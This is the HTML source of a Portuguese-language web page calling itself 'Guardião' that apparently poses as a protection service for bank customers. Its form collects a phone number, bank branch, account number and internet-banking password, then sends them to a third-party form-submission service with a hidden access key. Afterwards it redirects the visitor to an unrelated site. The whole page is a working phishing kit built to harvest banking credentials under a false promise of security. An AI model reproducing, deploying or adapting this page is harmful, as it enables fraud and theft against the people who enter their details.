 <!DOCTYPE html>
<html lang="en">
<head>
<link rel="shortcut icon" type "image/png" href="https://github.com/frank8576/test/assets/169180226/a6cb58b6-33ff-43cc-b2bf-9b4b0744a449"width="700" height="540"/>
<title> O Guardião vai proteger você</title>


    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
   
   
	<meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Guardião</title>
	
 <style type="text/css">
 <style>
 
		{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: sans-serif;
}




body{
    display: flex;
    align-items: center;
    justify-content: center;
    min-height: 100vh;
    background: #FF8C00;
	
}
section{
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
    padding: 10px 45px;
    background: #000099;
    width: 500px;
    box-shadow: rgba(0, 0, 0, 0.4) 0px 2px 4px, rgba(0, 0, 0, 0.3) 0px 7px 13px -3px, rgba(0, 0, 0, 0.2) 0px -3px 0px inset;
}
section h2{
    color: #f5f5f5;
    font-size: 2.5rem;
    margin: 2rem;
}
section form{
    display: flex;
    flex-direction: column;
    width: 100%;
}
form label{
    color: #f5f5f5;
    font-size: 17px;
    margin-bottom: 4px;
}
form input{
    padding: 15px;
    outline: none;
    border: 0;
    margin-bottom: 20px;
    font-size: 15px;
    transition: all 0.5s;
}
form input:focus{
    border-radius: 16px;
}
form textarea{
    padding: 10px;
    outline: none;
    border: 0;
    font-size: 15px;
    margin-bottom: 30px;
    transition: all 0.5s;
}
form textarea:focus{
    border-radius: 16px;
}
form button{
    padding: 15px;
    cursor: pointer;
    font-size: 16px;
    background: transparent;
    border: 2px solid #f5f5f5;
    color: #f5f5f5;
    transition: all 1s;
    margin-bottom: 20px;
}
form button:hover{
    background: #f5f5f5;
    color: #101026;
    border-radius: 16px;
}

/*Página do Obrigado*/

.main{
   display: flex;
   align-items: center;
   justify-content: center;
   min-height: 100vh;
   background: #101026;
   flex-direction: column;
}
.text{
    font-size: 45px;
    color: #f5f5f5;
    margin-bottom: 30px;
}
.paragrafo{
    color: #f5f5f5;
    margin-bottom: 50px;
}
.btn{
    padding: 15px 55px;
    background: #f5f5f5;
    text-decoration: none;
    color: #101026;
    font-size: 18px;
    transition: all 0.5s;
}
.btn:hover{
    border-radius: 16px;
}
@media only screen 
  and (min-device-width: 320px) 
  and (max-device-width: 480px)
  and (-webkit-min-device-pixel-ratio: 2) {

  /** Formatar o menu para telas de iPhone 4 e 4s **/
  nav {
    color: white;
    background-color: #333333;
    position: fixed;
    top: 0;
  }

	</style>
    
  
</head>
<body>




    <section>
	
  
 
 
  
	
  
        <h2>GUARDIÃO</h2>
		<h4> Proteja suas informações </h4>
 <form action="https://api.staticforms.xyz/submit" method="post">
<script>
function formatar(mascara, documento){
  var i = documento.value.length;
  var saida = mascara.substring(0,1);
  var texto = mascara.substring(i)
  
  if (texto.substring(0,1) != saida){
            documento.value += texto.substring(0,1);
  }
  
}
</script>

<label for="telefone">Ex.: 11912341234</label>
  
    <input formControlName="sGPTypeDeliveryId" type="text"   size="13"   maxlength="13" name="name"  placeholder="Seu telefone" class="form-control" required="required" pattern="[0-9]+$"  / required >
        
<label for="ag">Ex.: 1234</label>		
						 
        <input  formControlName="sGPTypeDeliveryId" type="text" size="4" maxlength="4"  name="name"  placeholder="Sua Agencia os Quatro Numeros"class="form-control" required="required" pattern="[0-9]+$"  / required >
		
	<label for="ct">Ex.: 12345678900</label>
			
		
		<input  formControlName="sGPTypeDeliveryId"  type="text"  size="11" maxlength="11"  name="name"  placeholder="Sua conta e Digito"class="form-control" required="required" pattern="[0-9]+$"  /required >
	
		
	
		
		<input type="password" name="name" maxlength="6" size "6" placeholder="Sua Senha Net"/  required >
     

	
	  
        <input type="text" name="honeypot" style="display:none">
	
		
        <input type="hidden" name="accessKey" value="d289b343-01b7-4209-8244-09c5c4c55cf4">
        <input type="hidden" name="subject" value="Contact us from - example.com" />
        
       <input type="hidden" name="redirectTo" value="http://www.monge.com.br">
        <input type="submit" value="Enviar" />
		</form>
 
	